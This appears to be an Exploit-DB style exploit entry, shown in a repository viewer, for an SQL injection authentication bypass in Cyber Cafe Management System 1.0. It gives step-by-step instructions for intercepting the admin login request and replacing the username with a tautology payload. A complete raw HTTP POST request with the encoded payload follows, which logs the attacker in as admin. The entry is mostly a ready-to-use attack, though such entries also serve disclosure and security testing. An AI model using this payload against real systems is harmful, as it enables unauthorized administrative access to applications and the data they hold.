f32872547a
5 changes to exploits/shellcodes Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated) Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi) PlaceOS 1.2109.1 - Open Redirection
32 lines
No EOL
1.2 KiB
Text
32 lines
No EOL
1.2 KiB
Text
# Exploit Title: Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass
|
||
# Date: 29-09-2021
|
||
# Exploit Author: sudoninja
|
||
# Vendor Homepage: https://phpgurukul.com
|
||
# Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
|
||
# Version: 1.0
|
||
# Tested on: XAMPP / Windows 10
|
||
|
||
Steps-To-Reproduce:
|
||
Step 1 Go to the Product admin panel http://localhost/ccms/index.php.
|
||
Step 2 – Enter anything in username and password
|
||
Step 3 – Click on Login and capture the request in the burp suite
|
||
Step4 – Change the username to ' OR 1 -- - and password to ccms
|
||
Step 5 – Click forward and now you will be logged in as admin.
|
||
|
||
POC
|
||
|
||
POST /ccms/ HTTP/1.1
|
||
Host: localhost
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||
Accept-Language: en-US,en;q=0.5
|
||
Accept-Encoding: gzip, deflate
|
||
Content-Type: application/x-www-form-urlencoded
|
||
Content-Length: 49
|
||
Origin: http://localhost
|
||
Connection: close
|
||
Referer: http://localhost/ccms/
|
||
Cookie: PHPSESSID=agarg3okitkr3g8dbi5icnq8du
|
||
Upgrade-Insecure-Requests: 1
|
||
|
||
username='%20OR%201%20--%20-&password=ccms&login= |